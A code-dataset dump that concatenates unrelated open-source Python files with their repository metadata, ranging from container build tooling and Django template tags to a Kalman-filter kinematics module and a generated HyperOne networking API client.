push_new_singularity_image,
test_singularity_image,
cleanup,
)
from kipoi_containers import zenodoclient
from kipoi_utils.external.torchvision.dataset_utils import check_integrity
@dataclass
class SingularityHandler:
"""This is a dataclass to be instantiated in order to update and
adding singularity images"""
model_group: str
docker_image_name: str
model_group_to_singularity_dict: Dict
workflow_release_data: Dict
singularity_image_folder: Union[str, Path] = None
zenodo_client: zenodoclient.Client = zenodoclient.Client()
def __post_init__(self):
"""If a location has not been specified for saving the downloaded
singularity containers to, a value is populated from
SINGULARITY_PULL_FOLDER environment variable. If there is no
such variable, the current directory is served as default."""
if self.singularity_image_folder is None:
self.singularity_image_folder = os.environ.get(
"SINGULARITY_PULL_FOLDER", Path(__file__).parent.resolve()
)
def update_container_info(self, updated_singularity_dict: Dict) -> None:
"""Update url, md5 and name keys of the model group's singularity
container dict with the correspondong values from updated_singularity_dict"""
self.model_group_to_singularity_dict[self.model_group] = {
k: v
for k, v in updated_singularity_dict.items()
if k in ["url", "name", "md5"]
}
def update_release_workflow(self) -> None:
"""Update .github/workflows/release-workflow.yml with the newly
added model group if it is not using one of the shared environments"""
if "shared" not in self.singularity_image_name:
self.workflow_release_data["jobs"]["buildtestandpushsingularity"][
"strategy"
]["matrix"]["image"].append(
DoubleQuotedScalarString(
self.docker_image_name.split(":")[1].replace("-slim", "")
)
)
def add(
self,
models_to_test: List,
docker_to_model_dict: Dict = {},
push: bool = True,
) -> None:
"""Adds a new singularity image. The steps are as follows -
1. First, the new image is built and saved in
singularity_image_folder from the docker image
2. This new singularity image is tested with the models in
<models_to_test>
3. If everything is fine, push the image to zenodo and return
the modified url, name and md5 as a dict
4. Update <model_group_to_singularity_dict> with the new model
group as key and the dictionary with url, md5, key as values"""
if "shared" in self.docker_image_name:
self.singularity_image_name = (
f"kipoi-docker_{self.docker_image_name.split(':')[1]}.sif"
)
else:
self.singularity_image_name = (
f"kipoi-docker_{self.model_group.lower()}-slim.sif"
)
self.singularity_dict = {
"url": "",
"name": self.singularity_image_name.replace(".sif", ""),
"md5": "",
}
build_singularity_image(
name_of_docker_image=self.docker_image_name,
singularity_image_name=self.singularity_image_name,
singularity_image_folder=self.singularity_image_folder,
)
for model in models_to_test:
test_singularity_image(
singularity_image_folder=self.singularity_image_folder,
singularity_image_name=self.singularity_image_name,
model=model,
)
if "shared" not in self.docker_image_name:
new_singularity_dict = push_new_singularity_image(
zenodo_client=self.zenodo_client,
singularity_image_folder=self.singularity_image_folder,
singularity_dict=self.singularity_dict,
model_group=self.model_group,
push=push,
)
else:
example_model = docker_to_model_dict[
self.docker_image_name.replace("-slim", "")
][0]
new_singularity_dict = self.model_group_to_singularity_dict[
example_model.split("/")[0]
]
self.update_container_info(new_singularity_dict)
self.update_release_workflow()
def update(self, models_to_test: List, push: bool = True) -> None:
"""Updates an existing singularity image. The steps are as follows -
1. First, a singularity image is built and saved in
singularity_image_folder from the docker image
2. A checksum is computed and compared against the existing md5 key
3. If the new image is identical to the existing one,
a cleanup is performed followed by an exit.
2. Otherwise, This new singularity image is tested with the models in
<models_to_test>
3. If everything is fine, push the new image to zenodo as a new version
and return the modified url, name and md5 as a dict
4. Update <model_group_to_singularity_dict> with the new model
group as key and the dictionary with url, md5, key as values"""
self.singularity_dict = self.model_group_to_singularity_dict[
self.model_group
]
self.singularity_image_name = f'{self.singularity_dict["name"]}.sif'
singularity_image_path = build_singularity_image(
name_of_docker_image=self.docker_image_name,
singularity_image_name=self.singularity_image_name,
singularity_image_folder=self.singularity_image_folder,
)
checksum_match = check_integrity(
singularity_image_path, self.singularity_dict["md5"]
)
if checksum_match:
print(
f"No need to update the existing singularity container for {self.model_group}"
)
cleanup(singularity_image_path)
else:
for model in models_to_test:
test_singularity_image(
singularity_image_folder=self.singularity_image_folder,
singularity_image_name=self.singularity_image_name,
model=model,
)
updated_singularity_dict = update_existing_singularity_container(
zenodo_client=self.zenodo_client,
singularity_dict=self.singularity_dict,
singularity_image_folder=self.singularity_image_folder,
model_group=self.model_group,
push=push,
)
cleanup(singularity_image_path)
self.update_container_info(updated_singularity_dict)
| 2.28125
| 2
|
test/scloud/test_provisioner.py
|
harsimranmaan/splunk-cloud-sdk-go
| 0
|
12775575
|
import unittest
import test
def provisioner(*args):
return test.scloud("provisioner", *args)
class TestProvisioner(unittest.TestCase):
def setUp(self):
# retrieve the selected tenant name
code, self.tname, _ = test.scloud("get", "tenant")
self.assertEqual(0, code)
self.assertIsNotNone(self.tname)
def test_tenants(self):
code, tenants, _ = provisioner("list-tenants")
self.assertEqual(0, code)
self.assertTrue(any(t["name"] == self.tname for t in tenants))
code, tenant, _ = provisioner("get-tenant", self.tname)
self.assertEqual(0, code)
self.assertEqual(self.tname, tenant["name"])
self.assertTrue("createdAt" in tenant)
self.assertTrue("createdBy" in tenant)
if __name__ == "__main__":
unittest.main()
| 2.96875
| 3
|
familysearch/discovery.py
|
teoliphant/familysearch-python-sdk-opensource
| 1
|
12775576
|
# -*- coding: utf-8 -*-
"""FamilySearch Discovery submodule"""
# Python imports
# Magic
class Discovery(object):
"""https://familysearch.org/developers/docs/api/tree/FamilySearch_Collections_resource"""
def __init__(self):
"""https://familysearch.org/developers/docs/api/resources#discovery"""
# TODO: Set it up so that it doesn't need to call the submodules
# until absolutely necessary...
self.root_collection = self.get(self.base + '/.well-known/collection')
self.subcollections = self.get(self.root_collection['response']
['collections'][0]['links']
['subcollections']['href'])
self.collections = {}
self.fix_discovery()
def update_collection(self, collection):
response = self.get(self.collections[collection]['url'])['response']
self.collections[collection]['response'] = response
def fix_discovery(self):
"""The Hypermedia items are semi-permanent. Some things change
based on who's logged in (or out).
"""
for item in self.subcollections['response']['collections']:
self.collections[item['id']] = {}
self.collections[item['id']]['url'] = item['links']['self']['href']
if item['id'] == 'LDSO':
try:
self.update_collection("LDSO")
except KeyError:
self.lds_user = False
else:
self.lds_user = True
try:
self.user = self.get_current_user()['response']['users'][0]
except:
self.user = ""
| 2.515625
| 3
|
cruds/templatetags/crud_tags.py
|
poiedk/django-cruds
| 43
|
12775577
|
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
import os.path
from django.utils import six
from django.db import models
from django import template
from django.urls import (
NoReverseMatch,
reverse,
)
from django.utils.html import escape
from django.utils.safestring import mark_safe
from cruds import utils
register = template.Library()
@register.filter
def get_attr(obj, attr):
"""
Filter returns obj attribute.
"""
return getattr(obj, attr)
@register.simple_tag
def crud_url(obj, action):
try:
url = reverse(
utils.crud_url_name(type(obj), action),
kwargs={'pk': obj.pk})
except NoReverseMatch:
url = None
return url
def format_value_instance(value):
url = crud_url(value, utils.ACTION_DETAIL)
if url:
return mark_safe('<a href="%s">%s</a>' % (url, escape(value)))
if hasattr(value, 'get_absolute_url'):
url = getattr(value, 'get_absolute_url')()
return mark_safe('<a href="%s">%s</a>' % (url, escape(value)))
return value
@register.filter
def format_value(obj, field_name):
"""
Simple value formatting.
If value is model instance returns link to detail view if exists.
"""
display_func = getattr(obj, 'get_%s_display' % field_name, None)
if display_func:
return display_func()
value = getattr(obj, field_name)
if isinstance(value, models.fields.files.FieldFile):
if value:
return mark_safe('<a href="%s">%s</a>' % (
value.url,
os.path.basename(value.name),
))
else:
return ''
if isinstance(value, models.Model):
return format_value_instance(value)
if isinstance(value, models.Manager):
return mark_safe(', '.join(
[format_value_instance(instance) for instance in value.all()]
))
if value is None:
value = ""
return value
@register.inclusion_tag('cruds/templatetags/crud_fields.html')
def crud_fields(obj, fields=None):
"""
Display object fields in table rows::
<table>
{% crud_fields object 'id, %}
</table>
* ``fields`` fields to include
If fields is ``None`` all fields will be displayed.
If fields is ``string`` comma separated field names will be
displayed.
if field is dictionary, key should be field name and value
field verbose name.
"""
if fields is None:
fields = utils.get_fields(type(obj))
elif isinstance(fields, six.string_types):
field_names = [f.strip() for f in fields.split(',')]
fields = utils.get_fields(type(obj), include=field_names)
return {
'object': obj,
'fields': fields,
}
@register.simple_tag
def get_fields(model, fields=None):
"""
Assigns fields for model.
"""
include = [f.strip() for f in fields.split(',')] if fields else None
return utils.get_fields(
model,
include
)
| 2.140625
| 2
|
python/Intro/modules/test3.py
|
Joaxin/GitComments
| 0
|
12775578
|
from module3 import *
print(generate_code(10))
| 1.101563
| 1
|
kinemparse/kinematics.py
|
jd-jones/kinemparse
| 0
|
12775579
|
<gh_stars>0
import numpy as np
from blocks.core import geometry
def updateCovariance(R_new, P, gyro_cov, sample_period, sqrt_mode=False):
""" NOTE: if sqrt_mode, then P and gyro_cov are assumed to be the
square roots of these respective matrices.
"""
G = sample_period * R_new
if sqrt_mode:
# TODO
pass
else:
P_new = P + G @ gyro_cov @ G.T
return P_new
def updateOrientation(omega, R, sample_period):
R_new = geometry.exponentialMap(sample_period * omega) @ R
return R_new
def timeUpdate(omega, gyro_cov, R, P, sample_period, sqrt_mode=False):
R_new = updateOrientation(omega, R, sample_period)
P_new = updateCovariance(
R_new, P, gyro_cov, sample_period,
sqrt_mode=sqrt_mode
)
return R_new, P_new
def updatePosition(a, a_prev, a_cov, v, x, R, P, T, stationary_thresh=0.005):
""" State-space update to velocity and position estimates.
a: accel, t
v: velocity, t - 1
x: position, t - 1
R: orientation, t
T: sample period
"""
delta_a = a - a_prev
is_stationary = np.linalg.norm(delta_a) < stationary_thresh
if is_stationary:
v_new = np.zeros(3)
x_new = x
else:
a_compensated = R @ a - gravityVec()
v_new = v + T * a_compensated
x_new = x + T * v + 0.5 * T ** 2 * a_compensated
return v_new, x_new
def gravityVec():
g = np.zeros(3)
g[2] = 1
return g
def measurementUpdate(a, accel_cov, R, P, sqrt_mode=False):
g = gravityVec()
a_est = - R @ g
G = geometry.skewSymmetricMatrix(g)
H = - R @ G
# NOTE: H is always rank-deficient because the gravity vector only has one
# nonzero entry. This means the skew-symmetric matrix G will have one
# row and one column which are all zero.
# FIXME: Construct S, S_inv from matrix square root of P
if sqrt_mode:
pass
S = H @ P @ H.T
# pinv is a hack. S is singular because of the issue with H above.
S_inv = np.linalg.pinv(S)
K = P @ H.T @ S_inv
deviation_angle = K @ (a - a_est)
R_new = geometry.exponentialMap(deviation_angle) @ R
P_new = P - K @ S @ K.T
return R_new, P_new, deviation_angle
def matrixSquareRoot(psd_matrix):
# FIXME: This doesn't need to exist. Just compute the Cholesky factorization.
w, v = np.linalg.eigh(psd_matrix)
w_sqrt = np.sqrt(w)
# A = X @ X.T
# = V @ W @ V.T
# Therefore,
# X = V @ sqrt(W)
return v @ np.diag(w_sqrt)
def estimateOrientation(
angular_velocities, linear_accels=None,
gyro_cov=None, accel_cov=None,
init_orientation=None, init_cov=None,
init_velocity=None, init_position=None,
sample_period=0.02, sqrt_mode=False):
""" Estimate the orientation using a linear approximation (EKF). """
if init_orientation is None:
init_angle = np.zeros(3)
init_orientation = np.eye(3)
if init_cov is None:
init_cov = np.eye(3)
if gyro_cov is None:
gyro_cov = np.eye(3)
if accel_cov is None:
accel_cov = np.eye(3)
if init_velocity is None:
init_velocity = np.zeros(3)
if init_position is None:
init_position = np.zeros(3)
orientations = [] # [init_orientation.copy()]
covariances = [] # [gyro_cov.copy()]
angles = [] # [init_angle.copy()]
velocities = []
positions = []
if sqrt_mode:
gyro_cov = matrixSquareRoot(gyro_cov)
accel_cov = matrixSquareRoot(accel_cov)
R = init_orientation.copy()
P = init_cov.copy()
angle = init_angle.copy()
v = init_velocity.copy()
x = init_position.copy()
# omega_prev = np.zeros(3)
a_prev = np.zeros(3)
for omega, a in zip(angular_velocities, linear_accels):
R_new, P_new = timeUpdate(omega, gyro_cov, R, P, sample_period, sqrt_mode=sqrt_mode)
angle += omega * sample_period
v_new, x_new = updatePosition(a, a_prev, accel_cov, v, x, R_new, P_new, sample_period)
if linear_accels is not None:
R_new, P_new, deviation_angle = measurementUpdate(
a, accel_cov, R_new, P_new,
sqrt_mode=sqrt_mode
)
angle += deviation_angle
R = R_new.copy()
P = P_new.copy()
v = v_new.copy()
x = x_new.copy()
# omega_prev = omega
a_prev = a
if sqrt_mode:
P_new = P_new @ P_new.T
orientations.append(R_new)
covariances.append(P_new)
angles.append(angle.copy())
velocities.append(v_new)
positions.append(x_new)
angles = np.row_stack(tuple(angles))
velocities = np.row_stack(tuple(velocities))
positions = np.row_stack(tuple(positions))
return orientations, covariances, angles, velocities, positions
def isStationary(gyro_seq, thresh=1.5):
gyro_mag = np.linalg.norm(gyro_seq, axis=1)
return gyro_mag < thresh
def subtractStationaryMean(sample_seq):
is_stationary = isStationary(sample_seq)
stationary_samples = sample_seq[is_stationary, :]
stationary_mean = stationary_samples.mean(axis=0)
return sample_seq - stationary_mean
| 2.46875
| 2
|
tf/parameters.py
|
gitter-badger/text-fabric
| 0
|
12775580
|
<filename>tf/parameters.py
import sys
from zipfile import ZIP_DEFLATED
VERSION = '7.8.12'
NAME = 'Text-Fabric'
PACK_VERSION = '2'
ORG = 'annotation'
REPO = 'text-fabric'
URL_GH_API = 'https://api.github.com/repos'
URL_GH = 'https://github.com'
URL_NB = 'https://nbviewer.jupyter.org/github'
DOWNLOADS = '~/Downloads'
GH_BASE = '~/github'
EXPRESS_BASE = '~/text-fabric-data'
EXPRESS_SYNC = '__checkout__.txt'
EXPRESS_SYNC_LEGACY = [
'__release.txt',
'__commit.txt',
]
URL_TFDOC = f'https://{ORG}.github.io/{REPO}'
DOI_TEXT = '10.5281/zenodo.592193'
DOI_URL = 'https://doi.org/10.5281/zenodo.592193'
APIREF = f'https://{ORG}.github.io/{REPO}/Api/Fabric/'
APP_URL = f'{URL_GH}/{ORG}'
APP_NB_URL = f'{URL_NB}/{ORG}/tutorials/blob/master'
APP_GITHUB = f'{GH_BASE}/annotation'
APP_CODE = 'code'
TEMP_DIR = '_temp'
LOCATIONS = [
'~/Downloads/text-fabric-data',
'~/text-fabric-data',
'~/github/text-fabric-data',
'~/Dropbox/text-fabric-data',
'/mnt/shared/text-fabric-data',
]
GZIP_LEVEL = 2
PICKLE_PROTOCOL = 4
ZIP_OPTIONS = dict(
compression=ZIP_DEFLATED,
)
if sys.version_info[1] >= 7:
ZIP_OPTIONS['compresslevel'] = 6
YARN_RATIO = 1.25
TRY_LIMIT_FROM = 40
TRY_LIMIT_TO = 40
| 1.828125
| 2
|
config/overviewer/manualpois.py
|
randomhost/overviewer-config
| 2
|
12775581
|
<gh_stars>1-10
# vim: set expandtab tabstop=4 shiftwidth=4 softtabstop=4 filetype=python:
####################################################################################################
# Dependencies
####################################################################################################
global json
global os
import json
import logging
import os
####################################################################################################
# Points of Interest
####################################################################################################
manualpois = []
poiDirPath = '/home/minecraft/config/overviewer/poi/'
logging.info('Loading POIs from \'%s\'', poiDirPath)
if os.path.isdir(poiDirPath):
for file in os.listdir(poiDirPath):
poiFilePath=os.path.join(poiDirPath, file)
if os.path.isfile(poiFilePath):
with open(poiFilePath, 'r') as poiFile:
poiData = json.load(poiFile)
poiId = os.path.splitext(file)[0].capitalize()
for poi in poiData:
poi['id'] = poiId
manualpois.append(poi)
else:
logging.warning('Failed to load POI data from \'%s\'', poiDirPath)
| 1.796875
| 2
|
app/behaviors/mail_behavior.py
|
Joeper214/mailingapp
| 0
|
12775582
|
from ferris.core.ndb import Behavior
from app.behaviors.sanitize import Sanitize
class MailBehavior(Behavior):
sanitizer = Sanitize()
def before_put(self, instance):
instance.sender = self.sanitizer.sanitize_email(instance.sender)
instance.recipient = self.sanitizer.sanitize_email(instance.recipient)
instance.subject = self.sanitizer.sanitize_text(instance.subject)
instance.message = self.sanitizer.sanitize_text(instance.message)
| 2.53125
| 3
|
tag/Brain.py
|
AymericBasset/Reinforcment_Learning_Tag
| 0
|
12775583
|
import numpy as np
import random as rd
import tensorflow as tf
from tensorflow import keras
class Brain():
def __init__(self,brain_spec, random = True, weights = None):
self.brain_spec = brain_spec
##INIT
#This is a new brai,
self.neurones = keras.Sequential()
for i in range(len(brain_spec)-2):
#init the weights between two layers, with matrix [layer_i,layer_i+1] and the bias
self.neurones.add(keras.layers.Dense(brain_spec[i+1],activation= "elu",input_shape=(brain_spec[i],)))
#output layer
self.neurones.add(keras.layers.Dense(brain_spec[-1], activation="softmax"))
#In case want specific value
if not(random):
assert(weights != None)
self.neurones.set_weights(weights)
#self.brain.compile(optimizer="adam", loss =t.tanh_custom_loss,metrics=[t.tanh_custom_loss])
self.optimizer = keras.optimizers.Adam(learning_rate=0.01)
def think(self, x):
return(self.neurones(np.expand_dims(x,axis=0))).numpy()[0]
def mutate(self,mutation_factor = 0.1):
weights = self.neurones.get_weights()
for layer in weights:
layer += layer*rd.uniform(-1*mutation_factor,1*mutation_factor)*np.random.randint(2,size=layer.shape)
self.neurones.set_weights(weights)
def expand(self):
pass
def learn(self,memory):
pass
if __name__ == "__main__":
TEST = True
if TEST:
test_input = np.array([1,1,1,1])
output_size = 4
brain_spec = [test_input.shape[0],5,output_size]
print("#################### RANDOM INIT ######################################")
head = Brain(brain_spec,random = True)
print(head.neurones.get_weights())
print("#################### DEFINE INIT ######################################")
head = Brain(brain_spec,random = False, weights=head.neurones.get_weights())
print(head.neurones.get_weights())
print(head.neurones.summary())
print("#################### MUTATING ###########################################")
head.mutate()
print(head.neurones.get_weights())
##THINK
print("#################### THINKING ############################################")
print(head.think(test_input))
##LEARN
print(head.neurones.trainable_variables)
print("#################### LEARNING ############################################")
memory = [np.array([[1.0,1.0,10.0,10.0]]),np.array([2.0])]
head.learn(memory)
| 2.796875
| 3
|
middleman/exceptions.py
|
lucasrafaldini/proxy
| 2
|
12775584
|
<reponame>lucasrafaldini/proxy
class ServerNotRespondingException(BaseException):
"""
Exception raised when the requested server is not responding.
"""
def __init__(self, url):
self.url = url
def __str__(self):
return "Url '%s' is not responding." % self.url
class ExceededRequestsLimitException(BaseException):
"""
Exception raised when the number of requests has exceeded the
allowed limit.
"""
def __init__(self, ip, url):
self.ip = ip
self.url = url
def __str__(self):
return "Address {} has exceeded the allowed requests limit for path {}".format(
self.ip, self.path
)
class AccessNotRegisteredException(BaseException):
"""
Exception raised when the request is not registered.
"""
def __init__(self, key, ip, path):
self.key = key
self.ip = ip
self.path = path
def __str__(self):
return "Request from {} could not be registered for path {} - Key: {}".format(
self.ip, self.path, self.key
)
| 3.15625
| 3
|
alfi/trainers/trainer.py
|
mrandri19/alfi
| 4
|
12775585
|
import time
from abc import abstractmethod
from typing import List
from alfi.models import LFM
import torch
import numpy as np
import gpytorch
from torch.utils.data.dataloader import DataLoader
from alfi.utilities.torch import is_cuda
from alfi.datasets import LFMDataset
class Trainer:
"""
An abstract LFM trainer. Subclasses must implement the `single_epoch` function.
Parameters
----------
lfm: The Latent Force Model.
optimizers: list of `torch.optim.Optimizer`s. For when natural gradients are used for variational models.
dataset: Dataset where t_observed (D, T), m_observed (J, T).
give_output: whether the trainers should give the first output (y_0) as initial value to the model `forward()`
track_parameters: the keys into `named_parameters()` of parameters that the trainer should track. The
tracked parameters can be accessed from `parameter_trace`
train_mask: boolean mask
"""
def __init__(self,
lfm: LFM,
optimizers: List[torch.optim.Optimizer],
dataset: LFMDataset,
batch_size=1,
give_output=False,
track_parameters=None,
train_mask=None,
checkpoint_dir=None):
self.lfm = lfm
self.num_epochs = 0
self.optimizers = optimizers
self.use_natural_gradient = len(self.optimizers) > 1
self.batch_size = batch_size
self.data_loader = DataLoader(dataset, batch_size=batch_size, shuffle=False)
self.losses = None
self.give_output = give_output
self.train_mask = train_mask
self.checkpoint_dir = checkpoint_dir
self.parameter_trace = None
if track_parameters is not None:
named_params = dict(lfm.named_parameters())
self.parameter_trace = {key: [named_params[key].detach()] for key in track_parameters}
def train(self, epochs=20, report_interval=1, reporter_callback=None, **kwargs):
"""
Parameters:
reporter_callback: function called every report_interval
"""
self.lfm.train()
losses = list()
times = list()
end_epoch = self.num_epochs+epochs
for epoch in range(epochs):
epoch_loss, split_loss = self.single_epoch(epoch=self.num_epochs, **kwargs)
t = time.time()
times.append((t, epoch_loss))
if (epoch % report_interval) == 0:
if reporter_callback is not None:
reporter_callback(self.num_epochs)
print('Epoch %03d/%03d - Loss: %.2f (' % (
self.num_epochs + 1, end_epoch, epoch_loss), end='')
print(' '.join(map(lambda l: '%.2f' % l, split_loss)), end='')
if isinstance(self.lfm, gpytorch.models.GP):
kernel = self.lfm.covar_module
print(f') λ: {str(kernel.lengthscale.view(-1).detach().numpy())}', end='')
elif hasattr(self.lfm, 'gp_model'):
print(f') kernel: {self.lfm.summarise_gp_hyp()}', end='')
else:
print(')', end='')
self.print_extra()
if self.checkpoint_dir is not None:
self.lfm.save(self.checkpoint_dir / f'epoch{epoch}')
losses.append(split_loss)
self.after_epoch()
self.num_epochs += 1
losses = torch.tensor(losses).cpu().numpy()
if self.losses is None:
self.losses = np.empty((0, losses.shape[1]))
self.losses = np.concatenate([self.losses, losses], axis=0)
return times
@abstractmethod
def single_epoch(self, epoch=0, **kwargs):
raise NotImplementedError
def set_optimizers(self, optimizers):
self.optimizers = optimizers
def print_extra(self):
print('')
def after_epoch(self):
if self.parameter_trace is not None:
params = dict(self.lfm.named_parameters())
for key in params:
if key in self.parameter_trace:
self.parameter_trace[key].append(params[key].detach().clone())
| 2.65625
| 3
|
dvc/parsing/versions.py
|
lucasalavapena/dvc
| 9,136
|
12775586
|
<reponame>lucasalavapena/dvc
import enum
from collections.abc import Mapping
from voluptuous import validators
SCHEMA_KWD = "schema"
META_KWD = "meta"
def lockfile_version_schema(value):
expected = [LOCKFILE_VERSION.V2.value] # pylint: disable=no-member
msg = "invalid schema version {}, expected one of {}".format(
value, expected
)
return validators.Any(*expected, msg=msg)(value)
class VersionEnum(str, enum.Enum):
@classmethod
def all_versions(cls):
return [v.value for v in cls]
class LOCKFILE_VERSION(VersionEnum):
V1 = "1.0"
V2 = "2.0"
@classmethod
def from_dict(cls, data):
# 1) if it's empty or or is not a dict, use the latest one (V2).
# 2) use the `schema` identifier if it exists and is a supported
# version
# 3) if it's not in any of the supported version, use the latest one
# 4) if there's no identifier, it's a V1
if not data or not isinstance(data, Mapping):
return cls(cls.V2)
version = data.get(SCHEMA_KWD)
if version:
return cls(version if version in cls.all_versions() else cls.V2)
return cls(cls.V1)
| 2.390625
| 2
|
h1/api/networking_project_netgw_api.py
|
hyperonecom/h1-client-python
| 0
|
12775587
|
<reponame>hyperonecom/h1-client-python
"""
HyperOne
HyperOne API # noqa: E501
The version of the OpenAPI document: 0.1.0
Generated by: https://openapi-generator.tech
"""
import re # noqa: F401
import sys # noqa: F401
from h1.api_client import ApiClient, Endpoint as _Endpoint
from h1.model_utils import ( # noqa: F401
check_allowed_values,
check_validations,
date,
datetime,
file_type,
none_type,
validate_and_convert_types
)
from h1.model.event import Event
from h1.model.inline_response400 import InlineResponse400
from h1.model.netgw import Netgw
from h1.model.networking_project_netgw_attach import NetworkingProjectNetgwAttach
from h1.model.networking_project_netgw_create import NetworkingProjectNetgwCreate
from h1.model.networking_project_netgw_update import NetworkingProjectNetgwUpdate
from h1.model.resource_service import ResourceService
from h1.model.tag import Tag
from h1.model.tag_array import TagArray
class NetworkingProjectNetgwApi(object):
"""NOTE: This class is auto generated by OpenAPI Generator
Ref: https://openapi-generator.tech
Do not edit the class manually.
"""
def __init__(self, api_client=None):
if api_client is None:
api_client = ApiClient()
self.api_client = api_client
def __networking_project_netgw_attach(
self,
project_id,
location_id,
netgw_id,
networking_project_netgw_attach,
**kwargs
):
"""Attach networking/netgw # noqa: E501
action attach # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.networking_project_netgw_attach(project_id, location_id, netgw_id, networking_project_netgw_attach, async_req=True)
>>> result = thread.get()
Args:
project_id (str): Project Id
location_id (str): Location Id
netgw_id (str): Netgw Id
networking_project_netgw_attach (NetworkingProjectNetgwAttach):
Keyword Args:
x_idempotency_key (str): Idempotency key. [optional]
x_dry_run (str): Dry run. [optional]
_return_http_data_only (bool): response data without head status
code and headers. Default is True.
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding response data.
Default is True.
_request_timeout (float/tuple): timeout setting for this request. If one
number provided, it will be total request timeout. It can also
be a pair (tuple) of (connection, read) timeouts.
Default is None.
_check_input_type (bool): specifies if type checking
should be done one the data sent to the server.
Default is True.
_check_return_type (bool): specifies if type checking
should be done one the data received from the server.
Default is True.
_host_index (int/None): specifies the index of the server
that we want to use.
Default is read from the configuration.
async_req (bool): execute request asynchronously
Returns:
Netgw
If the method is called asynchronously, returns the request
thread.
"""
kwargs['async_req'] = kwargs.get(
'async_req', False
)
kwargs['_return_http_data_only'] = kwargs.get(
'_return_http_data_only', True
)
kwargs['_preload_content'] = kwargs.get(
'_preload_content', True
)
kwargs['_request_timeout'] = kwargs.get(
'_request_timeout', None
)
kwargs['_check_input_type'] = kwargs.get(
'_check_input_type', True
)
kwargs['_check_return_type'] = kwargs.get(
'_check_return_type', True
)
kwargs['_host_index'] = kwargs.get('_host_index')
kwargs['project_id'] = \
project_id
kwargs['location_id'] = \
location_id
kwargs['netgw_id'] = \
netgw_id
kwargs['networking_project_netgw_attach'] = \
networking_project_netgw_attach
return self.call_with_http_info(**kwargs)
self.networking_project_netgw_attach = _Endpoint(
settings={
'response_type': (Netgw,),
'auth': [
'BearerAuth'
],
'endpoint_path': '/networking/{locationId}/project/{projectId}/netgw/{netgwId}/actions/attach',
'operation_id': 'networking_project_netgw_attach',
'http_method': 'POST',
'servers': None,
},
params_map={
'all': [
'project_id',
'location_id',
'netgw_id',
'networking_project_netgw_attach',
'x_idempotency_key',
'x_dry_run',
],
'required': [
'project_id',
'location_id',
'netgw_id',
'networking_project_netgw_attach',
],
'nullable': [
],
'enum': [
],
'validation': [
]
},
root_map={
'validations': {
},
'allowed_values': {
},
'openapi_types': {
'project_id':
(str,),
'location_id':
(str,),
'netgw_id':
(str,),
'networking_project_netgw_attach':
(NetworkingProjectNetgwAttach,),
'x_idempotency_key':
(str,),
'x_dry_run':
(str,),
},
'attribute_map': {
'project_id': 'projectId',
'location_id': 'locationId',
'netgw_id': 'netgwId',
'x_idempotency_key': 'x-idempotency-key',
'x_dry_run': 'x-dry-run',
},
'location_map': {
'project_id': 'path',
'location_id': 'path',
'netgw_id': 'path',
'networking_project_netgw_attach': 'body',
'x_idempotency_key': 'header',
'x_dry_run': 'header',
},
'collection_format_map': {
}
},
headers_map={
'accept': [
'application/json'
],
'content_type': [
'application/json'
]
},
api_client=api_client,
callable=__networking_project_netgw_attach
)
def __networking_project_netgw_create(
self,
project_id,
location_id,
networking_project_netgw_create,
**kwargs
):
"""Create networking/netgw # noqa: E501
Create netgw # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.networking_project_netgw_create(project_id, location_id, networking_project_netgw_create, async_req=True)
>>> result = thread.get()
Args:
project_id (str): Project Id
location_id (str): Location Id
networking_project_netgw_create (NetworkingProjectNetgwCreate):
Keyword Args:
x_idempotency_key (str): Idempotency key. [optional]
x_dry_run (str): Dry run. [optional]
_return_http_data_only (bool): response data without head status
code and headers. Default is True.
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding response data.
Default is True.
_request_timeout (float/tuple): timeout setting for this request. If one
number provided, it will be total request timeout. It can also
be a pair (tuple) of (connection, read) timeouts.
Default is None.
_check_input_type (bool): specifies if type checking
should be done one the data sent to the server.
Default is True.
_check_return_type (bool): specifies if type checking
should be done one the data received from the server.
Default is True.
_host_index (int/None): specifies the index of the server
that we want to use.
Default is read from the configuration.
async_req (bool): execute request asynchronously
Returns:
Netgw
If the method is called asynchronously, returns the request
thread.
"""
kwargs['async_req'] = kwargs.get(
'async_req', False
)
kwargs['_return_http_data_only'] = kwargs.get(
'_return_http_data_only', True
)
kwargs['_preload_content'] = kwargs.get(
'_preload_content', True
)
kwargs['_request_timeout'] = kwargs.get(
'_request_timeout', None
)
kwargs['_check_input_type'] = kwargs.get(
'_check_input_type', True
)
kwargs['_check_return_type'] = kwargs.get(
'_check_return_type', True
)
kwargs['_host_index'] = kwargs.get('_host_index')
kwargs['project_id'] = \
project_id
kwargs['location_id'] = \
location_id
kwargs['networking_project_netgw_create'] = \
networking_project_netgw_create
return self.call_with_http_info(**kwargs)
self.networking_project_netgw_create = _Endpoint(
settings={
'response_type': (Netgw,),
'auth': [
'BearerAuth'
],
'endpoint_path': '/networking/{locationId}/project/{projectId}/netgw',
'operation_id': 'networking_project_netgw_create',
'http_method': 'POST',
'servers': None,
},
params_map={
'all': [
'project_id',
'location_id',
'networking_project_netgw_create',
'x_idempotency_key',
'x_dry_run',
],
'required': [
'project_id',
'location_id',
'networking_project_netgw_create',
],
'nullable': [
],
'enum': [
],
'validation': [
]
},
root_map={
'validations': {
},
'allowed_values': {
},
'openapi_types': {
'project_id':
(str,),
'location_id':
(str,),
'networking_project_netgw_create':
(NetworkingProjectNetgwCreate,),
'x_idempotency_key':
(str,),
'x_dry_run':
(str,),
},
'attribute_map': {
'project_id': 'projectId',
'location_id': 'locationId',
'x_idempotency_key': 'x-idempotency-key',
'x_dry_run': 'x-dry-run',
},
'location_map': {
'project_id': 'path',
'location_id': 'path',
'networking_project_netgw_create': 'body',
'x_idempotency_key': 'header',
'x_dry_run': 'header',
},
'collection_format_map': {
}
},
headers_map={
'accept': [
'application/json'
],
'content_type': [
'application/json'
]
},
api_client=api_client,
callable=__networking_project_netgw_create
)
def __networking_project_netgw_delete(
self,
project_id,
location_id,
netgw_id,
**kwargs
):
"""Delete networking/netgw # noqa: E501
Delete netgw # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.networking_project_netgw_delete(project_id, location_id, netgw_id, async_req=True)
>>> result = thread.get()
Args:
project_id (str): Project Id
location_id (str): Location Id
